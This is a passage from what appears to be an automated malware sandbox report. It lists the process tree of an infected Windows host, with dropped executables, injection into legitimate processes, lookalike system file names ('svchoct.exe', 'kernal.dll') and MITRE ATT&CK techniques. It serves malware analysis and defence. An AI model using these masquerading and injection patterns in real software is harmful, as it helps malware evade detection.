- - C:\Users\Admin\AppData\Roaming\dsdtsbw
    C:\Users\Admin\AppData\Roaming\dsdtsbw
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    PID:5192
- C:\Users\Admin\AppData\Roaming\tvdtsbw
  C:\Users\Admin\AppData\Roaming\tvdtsbw
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  PID:1656

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:344

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:500
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID:192

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4568

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4624

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4604

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:5256

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6048

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5144

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5672

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4836

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5892

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4800

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4152

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\23ebd2be492e4142a804cc5d193156e0 /t 4712 /p 5892
1⤵
PID:1444

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5408

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2556

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4616

C:\Users\Admin\AppData\Local\Temp\DDFD.exe
C:\Users\Admin\AppData\Local\Temp\DDFD.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5452

C:\Users\Admin\AppData\Local\Temp\E3E9.exe
C:\Users\Admin\AppData\Local\Temp\E3E9.exe
1⤵
- Executes dropped EXE
PID:3280
- C:\Users\Admin\AppData\Local\Temp\339802969.exe
  "C:\Users\Admin\AppData\Local\Temp\339802969.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3956
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    3⤵
    PID:5280
- C:\Users\Admin\AppData\Local\Temp\1230843919.exe
  "C:\Users\Admin\AppData\Local\Temp\1230843919.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1436
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    3⤵
    PID:4904
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    3⤵
    PID:4692
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    3⤵
    PID:1320

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5012

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5388

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Executes dropped EXE
PID:5608

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:4876

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4268

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:2716

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5368

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:5928

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5680

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2192
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2192 -s 1996
  2⤵
  - Program crash
  PID:4884

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4924

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:5228

C:\Users\Admin\AppData\Local\Temp\611D.exe
C:\Users\Admin\AppData\Local\Temp\611D.exe
1⤵
- Executes dropped EXE
PID:4716
- C:\Users\Admin\AppData\Local\Temp\kernal.dll
  "C:\Users\Admin\AppData\Local\Temp\kernal.dll" -s -pdfgdfxvhbdgvhfgjvhdgjhgdvhnrfgjvhtdfhgjhfh
  2⤵
  - Executes dropped EXE
  PID:4900
- - C:\Users\Admin\AppData\Roaming\system.exe
    "C:\Users\Admin\AppData\Roaming\system.exe"
    3⤵
    - Executes dropped EXE
    PID:5072
- - C:\Users\Admin\AppData\Roaming\svchoct.exe
    "C:\Users\Admin\AppData\Roaming\svchoct.exe"
    3⤵
    - Executes dropped EXE
    PID:1468
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 220
      4⤵
      Drops file in Windows directory
      Program crash
      PID:3928

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4948

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5128

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery